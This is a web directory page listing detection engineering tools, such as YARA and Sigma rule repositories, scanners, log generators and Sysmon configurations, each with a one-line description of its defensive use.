Detection Engineering Tools
Detection engineering and detection-as-code platforms for authoring, managing, testing, translating, sharing, and deploying detection rules and content (Sigma, YARA, Suricata, SIEM/EDR correlation rules) across the SOC. Includes detection rule repositories, generators, converters, and rule-management tooling.
Browse 188 detection engineering tools
FEATURED
USE CASES
Access a repository of Analytic Stories and security guides mapped to industry frameworks, with Splunk searches, machine learning algorithms, and playbooks for threat detection and response.
SALO is a framework that generates synthetic log events for security testing and research without requiring actual infrastructure or triggering real events.
An open-source platform that builds instrumented environments, simulates attacks, and integrates with Splunk for detection rule development and testing.
Container of 200 Windows EVTX samples for testing detection scripts and training on DFIR.
A tool to run YARA rules against node_module folders to identify suspicious scripts
A tool that enables Yara rule execution against compressed malware samples, supporting GZip, BZip2, and LZMA formats without manual decompression.
Official repository of YARA rules for threat detection and hunting
A curated collection of Sigma & Yara rules and Indicators of Compromise (IOCs) for threat detection and malware identification.
An IDA Pro plugin that uses YARA rules to automatically detect cryptographic constants and patterns in binary files during reverse engineering analysis.
Embeddable Yara library for Java with support for loading rules and scanning data.
A Sysmon configuration repository for customizing Microsoft Sysinternals Sysmon configurations with modular setup.
A multithreaded YARA scanner for incident response or malware zoos.
Generate Yara rules from function basic blocks in x64dbg.
VolatilityBot automates memory dump analysis by extracting executables, detecting code injections, and performing automated malware scanning using YARA and ClamAV.
A .NET wrapper for libyara that provides a simplified API for developing tools in C# and PowerShell.
A command-line tool that visually displays YARA rule matches, regex matches, and hex patterns in binary data with colored output and configurable context bytes.
Repository of automatically generated YARA rules from Malpedia's YARA-Signator with detailed statistics.
Tool for visualizing correspondences between YARA ruleset and samples
A tool for deep analysis of malicious files using ClamAV and YARA rules, with features like scoring suspect files, building visual tree graphs, and extracting specific patterns.
